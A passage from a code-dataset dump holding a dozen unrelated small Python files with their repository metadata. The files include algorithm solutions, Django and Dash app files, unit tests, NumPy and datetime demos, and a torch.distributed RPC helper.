        Values sharing a prime factor join one union-find component, and
        elements can be permuted freely within a component; the array is
        sortable iff, position by position, each value and the value sorted
        order places there share a component.

        Fixes vs. the original: ``find`` now does path compression, and the
        caller's list is no longer sorted in place (a hidden side effect).
        """
        limit = 10 ** 5  # problem constraint: 1 <= nums[i] <= 10**5
        parent = list(range(limit + 1))

        def find(x):
            # Locate the root, then compress the path for near-O(1) re-finds.
            root = x
            while parent[root] != root:
                root = parent[root]
            while parent[x] != root:
                parent[x], x = root, parent[x]
            return root

        def union(a, b):
            ra, rb = find(a), find(b)
            if ra != rb:
                # Attach the larger root under the smaller one.
                parent[max(ra, rb)] = min(ra, rb)

        # Primes up to 409 > sqrt(10**5): enough to trial-divide any value;
        # the p*p > num break always fires before the list is exhausted.
        primes = [
            2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61,
            67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137,
            139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,
            211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277,
            281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359,
            367, 373, 379, 383, 389, 397, 401, 409
        ]
        for num in nums:
            tmp = num
            for p in primes:
                if p * p > num:
                    break
                if tmp % p:
                    continue
                while tmp % p == 0:
                    tmp //= p
                union(p, num)
            if tmp > 1:
                # Remaining cofactor is a single prime > sqrt(num).
                union(tmp, num)
        # Compare against a sorted copy instead of mutating the input.
        return all(
            a == b or find(a) == find(b)
            for a, b in zip(sorted(nums), nums)
        )
# Ad-hoc smoke run: the first two assignments are immediately overwritten,
# so only [10, 5, 9, 3, 15] (expected: True) is actually exercised.
nums = [7, 21, 3]
nums = [5, 2, 6, 2]
nums = [10, 5, 9, 3, 15]
print(Solution().gcdSort(nums))
| [
"zzz136454872@163.com"
] | zzz136454872@163.com |
d902870ae9a1873fa7213787d5d72768ad6ec3af | dfc61cfb4e6e93c4143250691ff8279790451e59 | /ask-sdk-model/ask_sdk_model/interfaces/alexa/presentation/html/__init__.py | e9fd9971909fcd092b9687de32b0104f419ab99b | [
"Apache-2.0"
] | permissive | Shreyas-vgr/alexa-apis-for-python | 5c2444238ace749fc89c604e4a194cb0bf31ef78 | 74ea73b3b6a03fd9cb735fb8c1fb2bd961faab54 | refs/heads/master | 2020-11-26T04:48:25.302742 | 2019-12-19T03:35:26 | 2019-12-19T03:41:40 | 228,967,736 | 1 | 0 | Apache-2.0 | 2019-12-19T03:30:10 | 2019-12-19T03:30:10 | null | UTF-8 | Python | false | false | 1,091 | py | # coding: utf-8
#
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
from __future__ import absolute_import
from .transformer_type import TransformerType
from .handle_message_directive import HandleMessageDirective
from .transformer import Transformer
from .runtime import Runtime
from .start_request_method import StartRequestMethod
from .start_request import StartRequest
from .message_request import MessageRequest
from .configuration import Configuration
from .start_directive import StartDirective
from .alexa_presentation_html_interface import AlexaPresentationHtmlInterface
| [
"ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com"
] | ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com |
e69877e2f09786585a92a0ab3dbd3905b3ce3ce5 | cf297c3d66189d2bd9fd8bfdadaeff3ebe6eee05 | /WebBrickLibs/EventHandlers/tests/TestUtils.py | 156b35af8887add2352285a3dd71cb50154673ab | [
"BSD-3-Clause"
] | permissive | AndyThirtover/wb_gateway | 0cb68a1f2caf7f06942f94b867ea02f4f8695492 | 69f9c870369085f4440033201e2fb263a463a523 | refs/heads/master | 2022-01-19T00:07:20.456346 | 2022-01-05T21:08:16 | 2022-01-05T21:08:16 | 14,687,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,332 | py | # Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: TestUtils.py 3222 2009-07-14 15:32:00Z simon.hughes $
#
# Some test helpers for testing event handlers. Uses a SuperGlobal to save state.
#
import sys
import unittest
from EventLib.Event import Event, makeEvent
from EventHandlers.Utils import *
class TestUtilsUnit(unittest.TestCase):
    """Unit tests (Python 2 style) for EventHandlers.Utils.makeNewEvent."""
    def setUp(self):
        self._log = logging.getLogger( "TestUtils" )
        self._log.debug( "\n\nsetUp" )
    def tearDown(self):
        self._log.debug( "\n\ntearDown" )
    # Actual tests follow
    def testMakeEvent(self):
        # New event takes type/source from the template; payload merges
        # template other_data, copied old-event keys, and the extra dict
        # (later sources override earlier ones).
        self._log.debug( "\ntestMakeEvent" )
        newEvent = makeNewEvent(
            { 'type':'newtype',
              'source':'newsource',
              'other_data':{'data':'data','data1':'data1','data2':'data2' },
              'copy_other_data':{'data1':'data1', 'data2':'data2' }
            },
            makeEvent('oldType', 'oldSource', {'data1':'olddata1'} ),
            {'data2':'xtradata2'} )
        self.assertNotEqual( newEvent, None)
        self.assertEqual( newEvent.getType(), "newtype" )
        self.assertEqual( newEvent.getSource(), "newsource" )
        od = newEvent.getPayload()
        self.assertEqual( od['data'], "data" )
        self.assertEqual( od['data1'], "olddata1" )
        self.assertEqual( od['data2'], "xtradata2" )
    def testMakeEventSubsitution(self):
        # %(name)s placeholders in type/source/other_data are substituted
        # from the old event's payload.
        self._log.debug( "\ntestMakeEventSubsitution" )
        newEvent = makeNewEvent(
            { 'type':'%(Newtype)s',
              'source':'%(Newsource)s',
              'other_data':{'data':'data','data1':'TEST%(Subdata)sTEST','data2':'data2' },
            },
            makeEvent('oldType', 'oldSource', {'data1':'olddata1','Newtype':'SubType','Newsource':'SubSource','Subdata':'SUBBEDDATA'} ),
            {'data2':'xtradata2'} )
        print newEvent
        self.assertNotEqual( newEvent, None)
        self.assertEqual( newEvent.getType(), "SubType" )
        self.assertEqual( newEvent.getSource(), "SubSource" )
        od = newEvent.getPayload()
        self.assertEqual( od['data'], "data" )
        self.assertEqual( od['data1'], "TESTSUBBEDDATATEST" )
    def testDummy(self):
        # Placeholder so non-unit suites in getTestSuite() are never empty.
        return
from MiscLib import TestUtils
def getTestSuite(select="unit"):
    """
    Get test suite

    select  is one of the following:
        "unit"      return suite of unit tests only
        "component" return suite of unit and component tests
        "all"       return suite of unit, component and integration tests
        "pending"   return suite of pending tests
        name        a single named test to be run
    """
    # Maps suite name -> list of test method names defined on TestUtilsUnit.
    # Selection logic (including "all" and single-name lookup) is delegated
    # to MiscLib.TestUtils.getTestSuite below.
    testdict = {
        "unit":
            [
            "testMakeEvent",
            "testMakeEventSubsitution"
            ],
        "component":
            [ "testDummy"
            ],
        "integration":
            [ "testDummy"
            ],
        "pending":
            [ "testDummy"
            ]
        }
    return TestUtils.getTestSuite(TestUtilsUnit, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
TestUtils.runTests("TestUtils.log", getTestSuite, sys.argv)
| [
"github@lklyne.co.uk"
] | github@lklyne.co.uk |
5599614cd850830f9c0dd4726214b6fcd123965e | 783bda14ef99024acea3584bc19130375fec2508 | /04_02_Start.py | 5a73e134a03fdfaf2edc1910586ae2106d72afdf | [] | no_license | liberbell/opendata01 | 75d4ed22f54fb42112b02244c9bf2cfad08935ca | f1b7c33e6f61d7ca4f01cc96c4ce05c4f6fb78bf | refs/heads/master | 2020-03-21T10:25:08.678066 | 2018-08-21T00:21:09 | 2018-08-21T00:21:09 | 138,449,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | # Getting more control over formatting
from datetime import datetime
now = datetime.now()
# %a/%A: abbreviated/full weekday name; %d: zero-padded day of month
print(now.strftime('%a %A %d'))
# %b/%B: abbreviated/full month name; %m: zero-padded month number
print(now.strftime('%b %B %m'))
# %D: date as mm/dd/yy — platform-dependent (not in the portable C89 set)
print(now.strftime('%a %B %D'))
# %H:%M:%S: 24-hour time; %p: AM/PM marker (meant for use alongside %I)
print(now.strftime('%H : %M : %S %p'))
# %y/%Y: two- and four-digit year
print(now.strftime('%y %Y'))
| [
"liberbell@gmail.com"
] | liberbell@gmail.com |
bbab7556f06dd799a7a1c6cda3bc61ee1edfe69d | 5f98e7c49e88ed0f1c6ea306de7d1a325129a253 | /other_peoples_apps/basic_dash/dash3.py | 44997a2911358a6521ac3b1c0d58f001d0ecfcf0 | [] | no_license | simongarisch/basic_flask | d1e4c4dd8f4dc86e5603c9b4fc75dc6b455cdd48 | 5cdc5dc45a3a7c838b732e8fd068a28018f69475 | refs/heads/master | 2021-07-14T20:03:50.156056 | 2020-06-19T12:03:11 | 2020-06-19T12:03:11 | 172,444,123 | 1 | 0 | null | 2021-06-22T11:06:49 | 2019-02-25T06:04:07 | Python | UTF-8 | Python | false | false | 965 | py | import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
df = pd.read_csv('https://gist.githubusercontent.com/chriddyp/c78bf172206ce24f77d6363a2d754b59/raw/c353e8ef842413cae56ae3920b8fd78468aa4cb2/usa-agricultural-exports-2011.csv')
def generate_table(dataframe, max_rows=10):
    """Render the first *max_rows* rows of *dataframe* as a Dash html.Table.

    The header row comes from the frame's column labels; cell values are
    read positionally with .iloc, so the frame's own index labels are
    ignored.
    """
    return html.Table([
        html.Thead(
            html.Tr([html.Th(col) for col in dataframe.columns])
        ),
        html.Tbody([
            html.Tr([
                html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
            ]) for i in range(min(len(dataframe), max_rows))
        ])
    ])
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

# Dash wraps a Flask server for us; the layout is a static heading plus the
# table rendered from the CSV loaded above into `df`.
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)

app.layout = html.Div(children=[
    html.H4(children='US Agriculture Exports (2011)'),
    generate_table(df)
])

if __name__ == '__main__':
    app.run_server(debug=True)
| [
"gatman946@gmail.com"
] | gatman946@gmail.com |
392882b39640d468c4b7d572a0d0d27040cbf237 | ff4fe07752b61aa6404f85a8b4752e21e8a5bac8 | /challenge-064/lubos-kolouch/python/ch-2.py | df2d2041c3bf0af4f2b2c7edaa47e508d404a077 | [] | no_license | choroba/perlweeklychallenge-club | 7c7127b3380664ca829158f2b6161c2f0153dfd9 | 2b2c6ec6ece04737ba9a572109d5e7072fdaa14a | refs/heads/master | 2023-08-10T08:11:40.142292 | 2023-08-06T20:44:13 | 2023-08-06T20:44:13 | 189,776,839 | 0 | 1 | null | 2019-06-01T20:56:32 | 2019-06-01T20:56:32 | null | UTF-8 | Python | false | false | 729 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from typing import List
def word_sequence(S: str, W: List[str]) -> List[str]:
    """Decompose S into a concatenation of words drawn (with reuse) from W.

    Candidates are tried in the order given in W, backtracking on failure,
    so the first full decomposition in that order is returned. When S
    cannot be decomposed (or S is empty), returns [0].
    """

    def walk(remaining: str):
        # A fully consumed string needs no further words.
        if not remaining:
            return []
        for candidate in W:
            if remaining.startswith(candidate):
                tail = walk(remaining[len(candidate):])
                # None signals "no decomposition"; [] is a valid empty tail.
                if tail is not None:
                    return [candidate] + tail
        return None

    found = walk(S)
    return found if found else [0]
S1 = "perlweeklychallenge"
W1 = ["weekly", "challenge", "perl"]
S2 = "perlandraku"
W2 = ["python", "ruby", "haskell"]
print(word_sequence(S1, W1)) # Output: ['perl', 'weekly', 'challenge']
print(word_sequence(S2, W2)) # Output: [0]
| [
"lubos@kolouch.net"
] | lubos@kolouch.net |
1df25303d1c26a2dab78b3710ad8715b1f99e1d7 | ec78f8ab63aec0753b9360715a4276a971b78a82 | /py/data_analysis/np/b_indexing.py | f4b2c805ca8dc1f3bc734fb3f68db8f06f0173bc | [] | no_license | anderscui/ml | 4ace7e7b8cf248042d224bd54e81b691963b2e0e | 39238ba6d802df7e8bf1089ef3605cfc83b333ac | refs/heads/master | 2021-06-03T16:09:55.207202 | 2018-11-01T18:50:49 | 2018-11-01T18:50:49 | 23,989,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | import numpy as np
from numpy.random import randn
# Boolean-mask indexing demo on a 7x4 array of standard normals.
names = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'])
data = randn(7, 4)
print(names)
print(data)
# Elementwise comparison yields a boolean mask aligned with axis 0 of data.
print(names == 'Bob')
print(data[names == 'Bob'])
print(data[names == 'Bob', 2:])
print(data[names != 'Bob'])
# BUGFIX: this line used unary minus on a boolean array, `-(names == 'Bob')`,
# which was deprecated and now raises TypeError in NumPy; `~` is the
# logical-not operator for boolean masks.
print(data[~(names == 'Bob')])
mask = (names == 'Bob') | (names == 'Will')
print(data[mask])
# Clamp all negative entries to zero in place.
data[data < 0] = 0
print(data)
"anderscui@gmail.com"
] | anderscui@gmail.com |
a7ab3031e7812b193439335991eaa94fd5f32407 | 94e964496acd225e1a04060a9bc9f639e6cff99c | /app/invitations/urls.py | 30974ba9c9a16fa13ba9b7f1760d580f40cb79b6 | [] | no_license | indigocodeit/conflictcartographer | 64b6ab2c991cd3ad020c4832cdb26974d342b564 | ab19b4559c1e016ef485bfa1a01df17fb15679ce | refs/heads/master | 2023-03-05T00:44:03.805241 | 2021-02-19T08:50:23 | 2021-02-19T08:50:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 759 | py |
from django.urls import path, include
from django.conf.urls import url
from invitations.views import referralRedirect, referralSignup, handleExcelFile,fileuploadMenu, emailpreview,share
urlpatterns =[
    # Django's stock auth views (login, logout, password reset, ...).
    path("accounts/",include("django.contrib.auth.urls")),
    # Referral link: `refkey` identifies who invited the visitor.
    url("accounts/ref/(?P<refkey>[^/.]+)/$",referralRedirect, name="referral"),
    url("accounts/signup",referralSignup, name="referralSignup"),
    #path("accounts/signup",signup,name = "signup"),
    #path("accounts/bulkadd/",bulkAdd,name="bulkadd"),
    # Bulk invitations via an uploaded Excel sheet.
    path("upload/invexcel/", handleExcelFile, name = "uploadexcel"),
    path("fileupload/", fileuploadMenu, name = "fileupload"),
    # Admin-side preview of the invitation e-mail for one object.
    path("admin/invitations/emailpreview/<int:pk>/", emailpreview),
    path("api/share/",share,name="share")
]
| [
"pglandsverk@gmail.com"
] | pglandsverk@gmail.com |
b3ce5a872a19efb4767bc6923d50fc1851771e87 | 20348bd6e61f7019a696f2497a7b3c5c2d192796 | /wowmode/admin.py | 5851758c22a57ac5451904cdf44597e7f7843cf6 | [] | no_license | hypnopompicindex/cms | fa9c3e70de71744506d1d4ccb3bf24a3b82e8b4d | 81a634ca493385000e7028de632c5d9d04eeddaa | refs/heads/master | 2021-06-26T23:05:16.022544 | 2019-04-01T04:21:26 | 2019-04-01T04:21:26 | 128,445,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from django.contrib import admin
from .models import Videolist, Video
from adminsortable2.admin import SortableAdminMixin, SortableInlineAdminMixin
class VideoInline(SortableInlineAdminMixin, admin.TabularInline):
    """Drag-sortable tabular inline of Video rows shown on the Videolist page."""
    model = Video
    # Display-only columns; only order/file are edited here.
    readonly_fields = ('thumbnail', 'title')
    fields = ('order', 'title', 'file', 'thumbnail')
    # Project-local template (presumably adds the sort-handle markup — TODO confirm).
    template = "admin/wowmode/edit_inline/tabular.html"
@admin.register(Videolist)
class VideolistAdmin(SortableAdminMixin, admin.ModelAdmin):
    """Sortable change list for Videolist; 'active' is toggled directly in the list."""
    list_display = ['title', 'start_date', 'end_date', 'active']
    list_editable = ('active',)
    fields = ('title', 'start_date', 'end_date', 'active')
    inlines = [VideoInline]
"hypnopompicindex@gmail.com"
] | hypnopompicindex@gmail.com |
9dc0dba873157557aab7cbf28ec4ecb79b96e2db | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_revenue.py | d5ed97ac2bac6f928e632369e308122c3f31872d | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py |
#calss header
class _REVENUE():
def __init__(self,):
self.name = "REVENUE"
self.definitions = [u'the income that a government or company receives regularly: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
2284e877ba7253ab2c2663b4f0763d61698a085c | 9fae6f56ff77217aca8ae405a2bb2a2245461cc4 | /backend/taxi_profile/migrations/0001_initial.py | 19e1622e12af2de40a9c5cc0f883cee8ec77539c | [] | no_license | crowdbotics-apps/ready-18854 | 7c554b307dcab02274c10e31264712f607f6f01a | e37d0a3d3909b6defe071ffd9026511ae20db53c | refs/heads/master | 2022-11-06T22:56:45.127940 | 2020-07-13T02:29:07 | 2020-07-13T02:29:07 | 279,189,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | # Generated by Django 2.2.14 on 2020-07-13 02:28
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mobile_number', models.CharField(blank=True, max_length=20, null=True)),
('photo', models.URLField(blank=True, null=True)),
('status', models.CharField(blank=True, max_length=50, null=True)),
('timestamp_created', models.DateTimeField(auto_now_add=True, null=True)),
('last_updated', models.DateTimeField(auto_now=True, null=True)),
('last_login', models.DateTimeField(blank=True, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='userprofile_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Notification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=20)),
('message', models.TextField()),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('users', models.ManyToManyField(related_name='notification_users', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='InviteCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=20)),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitecode_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='DriverProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mobile_number', models.CharField(max_length=20)),
('photo', models.URLField()),
('driver_status', models.CharField(max_length=50)),
('timestamp_created', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('last_login', models.DateTimeField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='driverprofile_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Document',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('file', models.URLField()),
('description', models.TextField(blank=True, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='document_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4dbe179017640dc1772bf32986f395dcfe46257c | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Practice_Anisul/149.py | 0787f34ea6607e53a80621276df0598ec6b76a36 | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | tpl = (
1,
3,
6,
4,
"Tuhin",
"Rana",
(1, 2, 3)
)
print(tpl)
print(tpl[0])
print(tpl[1])
print(tpl[2])
print(tpl[3])
print(tpl[4])
print(tpl[6])
print(tpl[6][1]) | [
"touhiduzzamantuhin95@gmail.com"
] | touhiduzzamantuhin95@gmail.com |
b06ce99b3d9241be378b1a68cabcf4a2a08191f0 | d91365b9da3cbd3a4c928591f25e55e615a61ebb | /torchbiggraph/rpc.py | f8cf4cc00eeb223c99249d384e23d4f10febd204 | [
"BSD-3-Clause"
] | permissive | pandeyankit83/PyTorch-BigGraph | 052ff88804bba8353a12385c5547445cdb22700b | 79e7fc06621ca7737689fa50c1e6cf6cea550a90 | refs/heads/master | 2022-12-05T02:16:52.169026 | 2020-06-22T17:29:36 | 2020-06-22T17:30:44 | 277,336,532 | 3 | 1 | NOASSERTION | 2022-11-27T03:29:15 | 2020-07-05T16:04:10 | Python | UTF-8 | Python | false | false | 5,714 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import io
import sys
import traceback
import numpy as np
import torch
import torch.distributed as td
# FIXME: is it efficient to torch.save into a buf? It's going to have to copy
# all the tensors.
def _serialize(data):
buf = io.BytesIO()
torch.save(data, buf)
data_bytes = buf.getvalue()
# FIXME: how to properly copy bytes to ByteTensor?
t = torch.from_numpy(np.frombuffer(data_bytes, dtype=np.uint8))
return t
def _deserialize(t):
data_bytes = t.numpy().tobytes()
buf = io.BytesIO(data_bytes)
return torch.load(buf)
def send(data, dst):
    """
    Sends an arbitrary torch-serializable object to a destination node.
    This is a blocking send, equivalent to `torch.distributed.send`.

    Args:
        data: An arbitrary torch-serializable object to be sent.
        dst: The rank of the destination node.
    """
    # FIXME: we've got to get rid of this two-pass nonsense for dynamically sized
    # send and receive.
    # Wire protocol: first a 1-element LongTensor carrying the payload size,
    # then the uint8 payload itself; recv() mirrors this order.
    t = _serialize(data)
    sizet = torch.LongTensor([t.nelement()])
    td.send(sizet, dst)
    td.send(t, dst)
def recv(src=None):
    """
    Receives an arbitrary torch-serializable object from a source node.
    This is a blocking receive, `torch.distributed.recv`

    Args:
        src: The rank of the source node. If None, will receive from any rank.

    Returns:
        data: The data send from the source node.
        src: The rank of the source node.
    """
    # First message is the payload size; td.recv returns the actual sender's
    # rank, which is what makes src=None ("receive from anyone") work.
    sizet = torch.LongTensor(1)
    src = td.recv(sizet, src)
    t = torch.ByteTensor(sizet.item())
    td.recv(t, src)
    return _deserialize(t), src
_JOIN_KEY = "seU17sb9nwqDZhsH9AyW"
class Server(object):
    """Base class for an RPC server using `torch.distributed`.

    Users should subclass this class and add the server methods.

    Example:
        init_method = "file://myfile.tmp"
        num_clients = 1
        torch.distributed.init_process_group('gloo',
                                             init_method=init_method,
                                             world_size=num_clients + 1,
                                             rank=0)

        class MyServer(Server):
            def test_func(self, T, k=0):
                return ("the result is ", T + k)

        s = MyServer(num_clients)
        s.start() # will block until all clients have called `join()`
    """

    def __init__(self, num_clients):
        """
        Args:
            num_clients: The number of clients that will call `join()` upon
                completion.
        """
        self.num_clients = num_clients

    def start(self, groups=None):
        # Serve requests until every client has sent the join sentinel.
        # NOTE: `groups` is accepted but not used anywhere in this body.
        join_clients = []
        while True:
            rpc, src = recv()
            if rpc == _JOIN_KEY:
                join_clients += [src]
                if len(join_clients) == self.num_clients:
                    for client in join_clients:
                        # after sending the join cmd,
                        # each client waits on this ack to know everyone is done
                        # and it's safe to exit
                        send(_JOIN_KEY, client)
                    break
            else:
                # A request is (method_name, args, kwargs); dispatch on self.
                F, args, kwargs = rpc
                try:
                    res = getattr(self, F)(*args, **kwargs)
                    send((False, res), src)
                except BaseException as e:
                    # should we print the exception on the server also?
                    # traceback.print_exc()
                    # Reply (True, (exc, traceback_str)) so the client can
                    # re-raise; the boolean flag marks an error reply.
                    exc_str = traceback.format_exc()
                    send((True, (e, exc_str)), src)
class Client(object):
    """A client for connecting to a subclass of `rpc.Server`.

    Example:
        init_method = "file://myfile.tmp"
        num_clients = 1
        torch.distributed.init_process_group('gloo',
                                             init_method=init_method,
                                             world_size=num_clients + 1,
                                             rank=1)
        c = Client(MyServer, server_rank=0)
        print(c.test_func(torch.arange(0, 3), k=2))
        # ('the result is ', tensor([ 2,  3,  4]))
        c.join()
    """

    def __init__(self, server_class, server_rank):
        """
        Args:
            server_class: The class of the server object. This should be a
                subclass of `rpc.Server`.
            server_rank: The rank of the node where the `rpc.Server` is running.
        """
        self.server_class = server_class
        self.server_rank = server_rank

    def __getattr__(self, name):
        # Validate against the server class up front so a typo fails fast on
        # the client instead of costing a network round-trip.
        if name not in dir(self.server_class):
            raise AttributeError(
                "%s has no attribute %s" % (self.server_class.__name__, name)
            )
        func = getattr(self.server_class, name)
        if not isinstance(func, type(lambda: 1)):  # FIXME
            raise TypeError("%s object is not callable" % (type(func)))

        def inner(*args, **kwargs):
            # Mirror of Server.start's protocol: send (name, args, kwargs),
            # receive (is_exception, payload) back from the server rank.
            send((name, args, kwargs), self.server_rank)
            (is_exception, res), _src = recv(self.server_rank)
            if not is_exception:
                return res
            else:
                # Print the server-side traceback, then re-raise the original
                # exception locally.
                exc, exc_str = res
                print(exc_str, file=sys.stderr)
                raise exc
        return inner

    def join(self):
        """Should be called by each client upon completion, to ensure a clean exit.
        """
        send(_JOIN_KEY, self.server_rank)
        recv(self.server_rank)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
b21d14a806472b97f7bf97745f271b6370e98277 | 8520c991dc543f5f4e1efe59ab401824173bb985 | /63-unique-paths-ii/solution.py | dea9fccf6e2786fb22f3e04e49bad454437956f9 | [] | no_license | katryo/leetcode | d44f70f2853c4f5ea9a462d022feb0f5436c2236 | 0da45559271d3dba687858b8945b3e361ecc813c | refs/heads/master | 2020-03-24T12:04:53.859047 | 2020-02-18T04:27:55 | 2020-02-18T04:27:55 | 142,703,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,783 | py | # A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
#
# The robot can only move either down or right at any point in time.
# The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
#
# Now consider if some obstacles are added to the grids. How many unique paths would there be?
# An obstacle and empty space is marked as 1 and 0 respectively in the grid.
#
# Note: m and n will be at most 100.
#
# Example 1:
#
# Input:
# [
# [0,0,0],
# [0,1,0],
# [0,0,0]
# ]
# Output: 2
# Explanation:
# There is one obstacle in the middle of the 3x3 grid above.
# There are two ways to reach the bottom-right corner:
# 1. Right -> Right -> Down -> Down
# 2. Down -> Down -> Right -> Right
class Solution(object):
    def uniquePathsWithObstacles(self, obstacleGrid):
        """
        :type obstacleGrid: List[List[int]]
        :rtype: int

        Bottom-up dynamic programming: counts[r][c] is the number of
        obstacle-avoiding right/down paths from (0, 0) to (r, c); an
        obstacle cell contributes zero paths.
        """
        if not obstacleGrid or not obstacleGrid[0]:
            return 0
        rows, cols = len(obstacleGrid), len(obstacleGrid[0])
        counts = [[0] * cols for _ in range(rows)]
        for r in range(rows):
            for c in range(cols):
                if obstacleGrid[r][c]:
                    continue  # blocked: leave the count at zero
                if r == 0 and c == 0:
                    counts[r][c] = 1
                else:
                    from_above = counts[r - 1][c] if r > 0 else 0
                    from_left = counts[r][c - 1] if c > 0 else 0
                    counts[r][c] = from_above + from_left
        return counts[-1][-1]
# s = Solution()
# grid = [
# [0, 0, 0],
# [0, 1, 0],
# [0, 0, 0],
# [1, 0, 0]
# ]
# print(s.uniquePathsWithObstacles(grid))
| [
"katoryo55@gmail.com"
] | katoryo55@gmail.com |
a311f00d4d3dc50b38cd6be0089d3287ffd215ea | 53b307ed3c23c08ad95c46e4ed1b79ceb8cd3fe9 | /panels/apps.py | 7f4399c55c7fb010e218dd443330883d083231cd | [
"MIT"
] | permissive | mesebilisim/iotdashboard | e14fc66ecf03d109f01f5fc9253003dd676680cf | 2e974d55015071f61e3d990f0d63d756a4763c24 | refs/heads/master | 2020-05-23T11:15:56.599010 | 2017-07-12T10:07:21 | 2017-07-12T10:07:21 | 68,567,736 | 0 | 0 | null | 2016-09-19T03:58:14 | 2016-09-19T03:58:14 | null | UTF-8 | Python | false | false | 128 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class PanelsConfig(AppConfig):
    """Django application configuration for the 'panels' app."""
    name = 'panels'
| [
"electrocoder@gmail.com"
] | electrocoder@gmail.com |
82ce6bb03f39e5756d72aef556a8417aa39e95cc | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_083/ch77_2020_04_22_18_33_29_505824.py | 5dc8be2d1349c4c3b224e2d146ccfba098fc6d3c | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | def calcula_tempo(dnomes_aceleração):
    # NOTE(review): this function body looks broken as written:
    #   * `range(...) and a in dnomes_aceleração.values()` evaluates the `and`
    #     of a range object and a membership test (with `a` undefined) — it
